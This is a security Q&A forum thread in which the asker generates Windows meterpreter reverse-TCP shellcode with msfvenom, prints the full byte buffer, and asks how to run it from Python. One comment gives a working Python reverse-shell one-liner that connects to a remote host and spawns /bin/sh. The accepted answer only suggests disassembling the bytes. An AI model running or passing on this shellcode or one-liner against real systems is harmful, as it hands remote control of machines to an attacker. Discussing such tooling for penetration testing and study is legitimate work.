# Executing shellcode in python format

Tags: metasploit, python, shellcode, msfvenom, reverse-shell

So after running the command:

`msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py`

I receive the output:

```
buf =  b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\x0a\x00\x00\x1f\x68\x02"
buf += b"\x00\x1f\x90\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += b"\x53\xff\xd5"
```

How could I execute this code inside of a python script?

Comment: This is all covered in the msfvenom documentation.

Comment: It would be helpful to clarify if you really need to execute *this* shellcode from a python script (i.e. to test it somehow?) or if you're actually looking for a *python* reverse shell instead - something like `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

Comment: Yes I'm aware creating a reverse shell in python, even creating python/meterpreter/reverse_tcp but I'm looking to code a shell that is compatible with meterpreter's windows/meterpreter/reverse_tcp payload functions. Like webcam stream etc....

Answer (score 1, accepted):

Thats the shell code generated in python, you execute that on the target/vulnerable machine in general. Thats are the opcodes in assembler and python dont know nothing about it in general.

What you can do is to convert your shell code in assembler with any disassembler(capstone, distorm, etc...) python lib and then check this link https://stackoverflow.com/questions/6040932/executing-assembler-code-with-python. But you question is more about programming than security.